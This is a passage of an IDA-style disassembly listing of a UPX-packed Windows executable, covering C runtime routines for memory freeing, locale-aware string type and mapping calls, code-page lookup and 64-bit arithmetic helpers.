call sub_404F20
push dword ptr [esi+6Ch]
call sub_404F20
push dword ptr [esi+70h]
call sub_404F20
push dword ptr [esi+74h]
call sub_404F20
push dword ptr [esi+78h]
call sub_404F20
push dword ptr [esi+7Ch]
call sub_404F20
add esp, 40h
push dword ptr [esi+80h]
call sub_404F20
push dword ptr [esi+84h]
call sub_404F20
push dword ptr [esi+88h]
call sub_404F20
push dword ptr [esi+8Ch]
call sub_404F20
push dword ptr [esi+90h]
call sub_404F20
push dword ptr [esi+94h]
call sub_404F20
push dword ptr [esi+98h]
call sub_404F20
push dword ptr [esi+9Ch]
call sub_404F20
push dword ptr [esi+0A0h]
call sub_404F20
push dword ptr [esi+0A4h]
call sub_404F20
push dword ptr [esi+0A8h]
call sub_404F20
add esp, 2Ch
loc_40A0F9: ; CODE XREF: sub_409F6B+7�j
pop esi
retn
sub_409F6B endp
; =============== S U B R O U T I N E =======================================
sub_40A0FB proc near ; CODE XREF: sub_407A03+64�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40A139
mov eax, [esi]
cmp eax, ds:off_40FBE0
jz short loc_40A115
push eax
call sub_404F20
pop ecx
loc_40A115: ; CODE XREF: sub_40A0FB+11�j
mov eax, [esi+4]
cmp eax, ds:off_40FBE4
jz short loc_40A127
push eax
call sub_404F20
pop ecx
loc_40A127: ; CODE XREF: sub_40A0FB+23�j
mov esi, [esi+8]
cmp esi, ds:off_40FBE8
jz short loc_40A139
push esi
call sub_404F20
pop ecx
loc_40A139: ; CODE XREF: sub_40A0FB+7�j
; sub_40A0FB+35�j
pop esi
retn
sub_40A0FB endp
; =============== S U B R O U T I N E =======================================
sub_40A13B proc near ; CODE XREF: sub_407A03+43�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40A1C2
mov eax, [esi+0Ch]
cmp eax, ds:off_40FBEC
jz short loc_40A156
push eax
call sub_404F20
pop ecx
loc_40A156: ; CODE XREF: sub_40A13B+12�j
mov eax, [esi+10h]
cmp eax, ds:off_40FBF0
jz short loc_40A168
push eax
call sub_404F20
pop ecx
loc_40A168: ; CODE XREF: sub_40A13B+24�j
mov eax, [esi+14h]
cmp eax, ds:off_40FBF4
jz short loc_40A17A
push eax
call sub_404F20
pop ecx
loc_40A17A: ; CODE XREF: sub_40A13B+36�j
mov eax, [esi+18h]
cmp eax, ds:off_40FBF8
jz short loc_40A18C
push eax
call sub_404F20
pop ecx
loc_40A18C: ; CODE XREF: sub_40A13B+48�j
mov eax, [esi+1Ch]
cmp eax, ds:off_40FBFC
jz short loc_40A19E
push eax
call sub_404F20
pop ecx
loc_40A19E: ; CODE XREF: sub_40A13B+5A�j
mov eax, [esi+20h]
cmp eax, ds:off_40FC00
jz short loc_40A1B0
push eax
call sub_404F20
pop ecx
loc_40A1B0: ; CODE XREF: sub_40A13B+6C�j
mov esi, [esi+24h]
cmp esi, ds:off_40FC04
jz short loc_40A1C2
push esi
call sub_404F20
pop ecx
loc_40A1C2: ; CODE XREF: sub_40A13B+7�j
; sub_40A13B+7E�j
pop esi
retn
sub_40A13B endp
; =============== S U B R O U T I N E =======================================
sub_40A1C4 proc near ; CODE XREF: sub_40A226+126�p
; sub_40A460+220�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jz short locret_40A1DE
sub eax, 8
cmp dword ptr [eax], 0DDDDh
jnz short locret_40A1DE
push eax
call sub_404F20
pop ecx
locret_40A1DE: ; CODE XREF: sub_40A1C4+6�j
; sub_40A1C4+11�j
retn
sub_40A1C4 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40A1F4: ; CODE XREF: UPX0:0040A201�j
mov al, [edx]
or al, al
jz short loc_40A203
add edx, 1
bts [esp], eax
jmp short loc_40A1F4
; ---------------------------------------------------------------------------
loc_40A203: ; CODE XREF: UPX0:0040A1F8�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_40A20C: ; CODE XREF: UPX0:0040A21C�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_40A21E
add esi, 1
bt [esp], eax
jnb short loc_40A20C
loc_40A21E: ; CODE XREF: UPX0:0040A213�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A226 proc near ; CODE XREF: sub_40A3DE+29�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+var_4], eax
mov eax, ds:dword_4107F4
push ebx
push esi
xor ebx, ebx
cmp eax, ebx
push edi
mov edi, ecx
jnz short loc_40A27F
lea eax, [ebp+var_8]
push eax
xor esi, esi
inc esi
push esi
push offset dword_40D9FC
push esi
call dword_40C110 ; GetStringTypeW
test eax, eax
jz short loc_40A265
mov ds:dword_4107F4, esi
jmp short loc_40A299
; ---------------------------------------------------------------------------
loc_40A265: ; CODE XREF: sub_40A226+35�j
call dword_40C088 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40A27A
push 2
pop eax
mov ds:dword_4107F4, eax
jmp short loc_40A27F
; ---------------------------------------------------------------------------
loc_40A27A: ; CODE XREF: sub_40A226+48�j
mov eax, ds:dword_4107F4
loc_40A27F: ; CODE XREF: sub_40A226+1D�j
; sub_40A226+52�j
cmp eax, 2
jz loc_40A357
cmp eax, ebx
jz loc_40A357
cmp eax, 1
jnz loc_40A381
loc_40A299: ; CODE XREF: sub_40A226+3D�j
cmp [ebp+arg_10], ebx
mov [ebp+var_8], ebx
jnz short loc_40A2A9
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40A2A9: ; CODE XREF: sub_40A226+79�j
mov esi, dword_40C10C
xor eax, eax
cmp [ebp+arg_18], ebx
push ebx
push ebx
push [ebp+arg_8]
setnz al
push [ebp+arg_4]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call esi ; dword_40C10C
mov edi, eax
cmp edi, ebx
jz loc_40A381
jle short loc_40A314
cmp edi, 7FFFFFF0h
ja short loc_40A314
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40A2FE
call sub_40A970
mov eax, esp
cmp eax, ebx
jz short loc_40A312
mov dword ptr [eax], 0CCCCh
jmp short loc_40A30F
; ---------------------------------------------------------------------------
loc_40A2FE: ; CODE XREF: sub_40A226+C3�j
push eax
call sub_404E31
cmp eax, ebx
pop ecx
jz short loc_40A312
mov dword ptr [eax], 0DDDDh
loc_40A30F: ; CODE XREF: sub_40A226+D6�j
add eax, 8
loc_40A312: ; CODE XREF: sub_40A226+CE�j
; sub_40A226+E1�j
mov ebx, eax
loc_40A314: ; CODE XREF: sub_40A226+B0�j
; sub_40A226+B8�j
test ebx, ebx
jz short loc_40A381
lea eax, [edi+edi]
push eax
push 0
push ebx
call sub_4021D0
add esp, 0Ch
push edi
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call esi ; dword_40C10C
test eax, eax
jz short loc_40A34B
push [ebp+arg_C]
push eax
push ebx
push [ebp+arg_0]
call dword_40C110 ; GetStringTypeW
mov [ebp+var_8], eax
loc_40A34B: ; CODE XREF: sub_40A226+112�j
push ebx
call sub_40A1C4
mov eax, [ebp+var_8]
pop ecx
jmp short loc_40A3CC
; ---------------------------------------------------------------------------
loc_40A357: ; CODE XREF: sub_40A226+5C�j
; sub_40A226+64�j
xor esi, esi
cmp [ebp+arg_14], ebx
jnz short loc_40A366
mov eax, [edi]
mov eax, [eax+14h]
mov [ebp+arg_14], eax
loc_40A366: ; CODE XREF: sub_40A226+136�j
cmp [ebp+arg_10], ebx
jnz short loc_40A373
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40A373: ; CODE XREF: sub_40A226+143�j
push [ebp+arg_14]
call sub_40A99C
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40A385
loc_40A381: ; CODE XREF: sub_40A226+6D�j
; sub_40A226+AA�j ...
xor eax, eax
jmp short loc_40A3CC
; ---------------------------------------------------------------------------
loc_40A385: ; CODE XREF: sub_40A226+159�j
cmp eax, [ebp+arg_10]
jz short loc_40A3A8
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push [ebp+arg_10]
call sub_40A9E3
mov esi, eax
add esp, 18h
cmp esi, ebx
jz short loc_40A381
mov [ebp+arg_4], esi
loc_40A3A8: ; CODE XREF: sub_40A226+162�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+arg_14]
call dword_40C108 ; GetStringTypeA
cmp esi, ebx
mov edi, eax
jz short loc_40A3CA
push esi
call sub_404F20
pop ecx
loc_40A3CA: ; CODE XREF: sub_40A226+19B�j
mov eax, edi
loc_40A3CC: ; CODE XREF: sub_40A226+12F�j
; sub_40A226+15D�j
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_40224A
leave
retn
sub_40A226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A3DE proc near ; CODE XREF: sub_407D8D+96�p
; sub_40AB95+83�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_407FBB
push [ebp+arg_1C]
lea ecx, [ebp+var_10]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A226
add esp, 1Ch
cmp [ebp+var_4], 0
jz short locret_40A41C
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40A41C: ; CODE XREF: sub_40A3DE+35�j
leave
retn
sub_40A3DE endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40A434: ; CODE XREF: UPX0:0040A441�j
mov al, [edx]
or al, al
jz short loc_40A443
add edx, 1
bts [esp], eax
jmp short loc_40A434
; ---------------------------------------------------------------------------
loc_40A443: ; CODE XREF: UPX0:0040A438�j
mov esi, [ebp+8]
mov edi, edi
loc_40A448: ; CODE XREF: UPX0:0040A455�j
mov al, [esi]
or al, al
jz short loc_40A45A
add esi, 1
bt [esp], eax
jnb short loc_40A448
lea eax, [esi-1]
loc_40A45A: ; CODE XREF: UPX0:0040A44C�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A460 proc near ; CODE XREF: sub_40A802+2C�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
cmp ds:dword_4107F8, ebx
push edi
mov esi, ecx
jnz short loc_40A4B7
push ebx
push ebx
xor edi, edi
inc edi
push edi
push offset dword_40D9FC
push 100h
push ebx
call dword_40C118 ; LCMapStringW
test eax, eax
jz short loc_40A4A2
mov ds:dword_4107F8, edi
jmp short loc_40A4B7
; ---------------------------------------------------------------------------
loc_40A4A2: ; CODE XREF: sub_40A460+38�j
call dword_40C088 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40A4B7
mov ds:dword_4107F8, 2
loc_40A4B7: ; CODE XREF: sub_40A460+1D�j
; sub_40A460+40�j ...
cmp [ebp+arg_C], ebx
jle short loc_40A4DE
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_40A4C2: ; CODE XREF: sub_40A460+6A�j
dec ecx
cmp [eax], bl
jz short loc_40A4CF
inc eax
cmp ecx, ebx
jnz short loc_40A4C2
or ecx, 0FFFFFFFFh
loc_40A4CF: ; CODE XREF: sub_40A460+65�j
mov eax, [ebp+arg_C]
sub eax, ecx
dec eax
cmp eax, [ebp+arg_C]
jge short loc_40A4DB
inc eax
loc_40A4DB: ; CODE XREF: sub_40A460+78�j
mov [ebp+arg_C], eax
loc_40A4DE: ; CODE XREF: sub_40A460+5A�j
mov eax, ds:dword_4107F8
cmp eax, 2
jz loc_40A697
cmp eax, ebx
jz loc_40A697
cmp eax, 1
jnz loc_40A6C8
cmp [ebp+arg_18], ebx
mov [ebp+var_8], ebx
jnz short loc_40A50D
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40A50D: ; CODE XREF: sub_40A460+A3�j
mov esi, dword_40C10C
xor eax, eax
cmp [ebp+arg_1C], ebx
push ebx
push ebx
push [ebp+arg_C]
setnz al
push [ebp+arg_8]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call esi ; dword_40C10C
mov edi, eax
cmp edi, ebx
jz loc_40A6C8
jle short loc_40A57F
push 0FFFFFFE0h
xor edx, edx
pop eax
div edi
cmp eax, 2
jb short loc_40A57F
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40A566
call sub_40A970
mov eax, esp
cmp eax, ebx
jz short loc_40A57A
mov dword ptr [eax], 0CCCCh
jmp short loc_40A577
; ---------------------------------------------------------------------------
loc_40A566: ; CODE XREF: sub_40A460+F1�j
push eax
call sub_404E31
cmp eax, ebx
pop ecx
jz short loc_40A57A
mov dword ptr [eax], 0DDDDh
loc_40A577: ; CODE XREF: sub_40A460+104�j
add eax, 8
loc_40A57A: ; CODE XREF: sub_40A460+FC�j
; sub_40A460+10F�j
mov [ebp+var_C], eax
jmp short loc_40A582
; ---------------------------------------------------------------------------
loc_40A57F: ; CODE XREF: sub_40A460+DA�j
; sub_40A460+E6�j
mov [ebp+var_C], ebx
loc_40A582: ; CODE XREF: sub_40A460+11D�j
cmp [ebp+var_C], ebx
jz loc_40A6C8
push edi
push [ebp+var_C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call esi ; dword_40C10C
test eax, eax
jz loc_40A686
mov esi, dword_40C118
push ebx
push ebx
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; dword_40C118
mov ecx, eax
cmp ecx, ebx
mov [ebp+var_8], ecx
jz loc_40A686
test word ptr [ebp+arg_4], 400h
jz short loc_40A5F6
cmp [ebp+arg_14], ebx
jz loc_40A686
cmp ecx, [ebp+arg_14]
jg loc_40A686
push [ebp+arg_14]
push [ebp+arg_10]
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; dword_40C118
jmp loc_40A686
; ---------------------------------------------------------------------------
loc_40A5F6: ; CODE XREF: sub_40A460+16B�j
cmp ecx, ebx
jle short loc_40A63F
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, 2
jb short loc_40A63F
lea eax, [ecx+ecx+8]
cmp eax, 400h
ja short loc_40A627
call sub_40A970
mov esi, esp
cmp esi, ebx
jz short loc_40A686
mov dword ptr [esi], 0CCCCh
add esi, 8
jmp short loc_40A641
; ---------------------------------------------------------------------------
loc_40A627: ; CODE XREF: sub_40A460+1AF�j
push eax
call sub_404E31
cmp eax, ebx
pop ecx
jz short loc_40A63B
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40A63B: ; CODE XREF: sub_40A460+1D0�j
mov esi, eax
jmp short loc_40A641
; ---------------------------------------------------------------------------
loc_40A63F: ; CODE XREF: sub_40A460+198�j
; sub_40A460+1A4�j
xor esi, esi
loc_40A641: ; CODE XREF: sub_40A460+1C5�j
; sub_40A460+1DD�j
cmp esi, ebx
jz short loc_40A686
push [ebp+var_8]
push esi
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40C118 ; LCMapStringW
test eax, eax
jz short loc_40A67F
cmp [ebp+arg_14], ebx
push ebx
push ebx
jnz short loc_40A668
push ebx
push ebx
jmp short loc_40A66E
; ---------------------------------------------------------------------------
loc_40A668: ; CODE XREF: sub_40A460+202�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_40A66E: ; CODE XREF: sub_40A460+206�j
push [ebp+var_8]
push esi
push ebx
push [ebp+arg_18]
call dword_40C0AC ; WideCharToMultiByte
mov [ebp+var_8], eax
loc_40A67F: ; CODE XREF: sub_40A460+1FB�j
push esi
call sub_40A1C4
pop ecx
loc_40A686: ; CODE XREF: sub_40A460+13E�j
; sub_40A460+15F�j ...
push [ebp+var_C]
call sub_40A1C4
mov eax, [ebp+var_8]
pop ecx
jmp loc_40A7F0
; ---------------------------------------------------------------------------
loc_40A697: ; CODE XREF: sub_40A460+86�j
; sub_40A460+8E�j
cmp [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_40A6AA
mov eax, [esi]
mov eax, [eax+14h]
mov [ebp+arg_0], eax
loc_40A6AA: ; CODE XREF: sub_40A460+240�j
cmp [ebp+arg_18], ebx
jnz short loc_40A6B7
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40A6B7: ; CODE XREF: sub_40A460+24D�j
push [ebp+arg_0]
call sub_40A99C
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jnz short loc_40A6CF
loc_40A6C8: ; CODE XREF: sub_40A460+97�j
; sub_40A460+D4�j ...
xor eax, eax
jmp loc_40A7F0
; ---------------------------------------------------------------------------
loc_40A6CF: ; CODE XREF: sub_40A460+266�j
cmp eax, [ebp+arg_18]
jz loc_40A7B3
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_40A9E3
add esp, 18h
cmp eax, ebx
mov [ebp+var_C], eax
jz short loc_40A6C8
mov esi, dword_40C114
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; dword_40C114
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40A716
loc_40A70F: ; CODE XREF: sub_40A460+2D0�j
; sub_40A460+2F9�j
xor esi, esi
jmp loc_40A7CD
; ---------------------------------------------------------------------------
loc_40A716: ; CODE XREF: sub_40A460+2AD�j
jle short loc_40A755
cmp eax, 0FFFFFFE0h
ja short loc_40A755
add eax, 8
cmp eax, 400h
ja short loc_40A73D
call sub_40A970
mov edi, esp
cmp edi, ebx
jz short loc_40A70F
mov dword ptr [edi], 0CCCCh
add edi, 8
jmp short loc_40A757
; ---------------------------------------------------------------------------
loc_40A73D: ; CODE XREF: sub_40A460+2C5�j
push eax
call sub_404E31
cmp eax, ebx
pop ecx
jz short loc_40A751
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40A751: ; CODE XREF: sub_40A460+2E6�j
mov edi, eax
jmp short loc_40A757
; ---------------------------------------------------------------------------
loc_40A755: ; CODE XREF: sub_40A460:loc_40A716�j
; sub_40A460+2BB�j
xor edi, edi
loc_40A757: ; CODE XREF: sub_40A460+2DB�j
; sub_40A460+2F3�j
cmp edi, ebx
jz short loc_40A70F
push [ebp+var_8]
push ebx
push edi
call sub_4021D0
add esp, 0Ch
push [ebp+var_8]
push edi
push [ebp+arg_C]
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; dword_40C114
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40A785
xor esi, esi
jmp short loc_40A7AA
; ---------------------------------------------------------------------------
loc_40A785: ; CODE XREF: sub_40A460+31F�j
push [ebp+arg_14]
lea eax, [ebp+var_8]
push [ebp+arg_10]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_14]
call sub_40A9E3
mov esi, eax
mov [ebp+var_10], esi
add esp, 18h
neg esi
sbb esi, esi
and esi, [ebp+var_8]
loc_40A7AA: ; CODE XREF: sub_40A460+323�j
push edi
call sub_40A1C4
pop ecx
jmp short loc_40A7CD
; ---------------------------------------------------------------------------
loc_40A7B3: ; CODE XREF: sub_40A460+272�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40C114 ; LCMapStringA
mov esi, eax
loc_40A7CD: ; CODE XREF: sub_40A460+2B1�j
; sub_40A460+351�j
cmp [ebp+var_C], ebx
jz short loc_40A7DB
push [ebp+var_C]
call sub_404F20
pop ecx
loc_40A7DB: ; CODE XREF: sub_40A460+370�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_40A7EE
cmp [ebp+arg_10], eax
jz short loc_40A7EE
push eax
call sub_404F20
pop ecx
loc_40A7EE: ; CODE XREF: sub_40A460+380�j
; sub_40A460+385�j
mov eax, esi
loc_40A7F0: ; CODE XREF: sub_40A460+232�j
; sub_40A460+26A�j
lea esp, [ebp-20h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_40224A
leave
retn
sub_40A460 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A802 proc near ; CODE XREF: sub_407D8D+B6�p
; sub_407D8D+DB�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_407FBB
push [ebp+arg_20]
lea ecx, [ebp+var_10]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A460
add esp, 20h
cmp [ebp+var_4], 0
jz short locret_40A843
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40A843: ; CODE XREF: sub_40A802+38�j
leave
retn
sub_40A802 endp
; =============== S U B R O U T I N E =======================================
sub_40A845 proc near ; DATA XREF: UPX1:off_40FAD8�o
; UPX1:0040FADC�o ...
push 2
call sub_405549
pop ecx
retn
sub_40A845 endp
; ---------------------------------------------------------------------------
align 10h
push esi
mov eax, [esp+14h]
or eax, eax
jnz short loc_40A881
mov ecx, [esp+10h]
mov eax, [esp+0Ch]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8]
div ecx
mov esi, eax
mov eax, ebx
mul dword ptr [esp+10h]
mov ecx, eax
mov eax, esi
mul dword ptr [esp+10h]
add edx, ecx
jmp short loc_40A8C8
; ---------------------------------------------------------------------------
loc_40A881: ; CODE XREF: UPX0:0040A857�j
mov ecx, eax
mov ebx, [esp+10h]
mov edx, [esp+0Ch]
mov eax, [esp+8]
loc_40A88F: ; CODE XREF: UPX0:0040A899�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40A88F
div ebx
mov esi, eax
mul dword ptr [esp+14h]
mov ecx, eax
mov eax, [esp+10h]
mul esi
add edx, ecx
jb short loc_40A8BD
cmp edx, [esp+0Ch]
ja short loc_40A8BD
jb short loc_40A8C6
cmp eax, [esp+8]
jbe short loc_40A8C6
loc_40A8BD: ; CODE XREF: UPX0:0040A8AD�j
; UPX0:0040A8B3�j
dec esi
sub eax, [esp+10h]
sbb edx, [esp+14h]
loc_40A8C6: ; CODE XREF: UPX0:0040A8B5�j
; UPX0:0040A8BB�j
xor ebx, ebx
loc_40A8C8: ; CODE XREF: UPX0:0040A87F�j
sub eax, [esp+8]
sbb edx, [esp+0Ch]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_40A909
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_40A909: ; CODE XREF: UPX0:0040A8FE�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; =============== S U B R O U T I N E =======================================
sub_40A924 proc near ; CODE XREF: sub_40A99C+35�p
arg_0 = dword ptr 4
push 0Ah
push 0
push [esp+8+arg_0]
call sub_40AE76
add esp, 0Ch
retn
sub_40A924 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A935 proc near ; CODE XREF: sub_40AB95+42�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_407FBB
movzx eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, 8000h
cmp [ebp+var_4], 0
jz short locret_40A969
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40A969: ; CODE XREF: sub_40A935+2B�j
leave
retn
sub_40A935 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A970 proc near ; CODE XREF: sub_40A226+C5�p
; sub_40A460+F3�p ...
arg_0 = byte ptr 4
; FUNCTION CHUNK AT 0040AEA0 SIZE 0000002B BYTES
push ecx
lea ecx, [esp+4+arg_0]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp loc_40AEA0
sub_40A970 endp
; ---------------------------------------------------------------------------
push ecx
lea ecx, [esp+8]
sub ecx, eax
and ecx, 7
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp loc_40AEA0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A99C proc near ; CODE XREF: sub_40A226+150�p
; sub_40A460+25A�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+var_4], eax
push 6
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call dword_40C104 ; GetLocaleInfoA
test eax, eax
jnz short loc_40A9CD
or eax, 0FFFFFFFFh
jmp short loc_40A9D7
; ---------------------------------------------------------------------------
loc_40A9CD: ; CODE XREF: sub_40A99C+2A�j
lea eax, [ebp+var_C]
push eax
call sub_40A924
pop ecx
loc_40A9D7: ; CODE XREF: sub_40A99C+2F�j
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_40224A
leave
retn
sub_40A99C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9E3 proc near ; CODE XREF: sub_40A226+171�p
; sub_40A460+285�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
mov [ebp+var_28], eax
mov eax, [ebp+arg_C]
push ebx
mov [ebp+var_30], eax
mov eax, [eax]
push esi
mov [ebp+var_24], eax
mov eax, [ebp+arg_0]
push edi
xor edi, edi
cmp eax, [ebp+arg_4]
mov [ebp+var_34], ecx
mov [ebp+var_20], edi
mov [ebp+var_2C], edi
jz loc_40AB80
mov esi, dword_40C0E4
lea ecx, [ebp+var_18]
push ecx
push eax
call esi ; dword_40C0E4
test eax, eax
mov ebx, dword_40C10C
jz short loc_40AA96
cmp [ebp+var_18], 1
jnz short loc_40AA96
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call esi ; dword_40C0E4
test eax, eax
jz short loc_40AA96
cmp [ebp+var_18], 1
jnz short loc_40AA96
mov esi, [ebp+var_24]
cmp esi, 0FFFFFFFFh
mov [ebp+var_2C], 1
jnz short loc_40AA6C
push [ebp+var_28]
call sub_4026A0
mov esi, eax
pop ecx
inc esi
loc_40AA6C: ; CODE XREF: sub_40A9E3+7B�j
cmp esi, edi
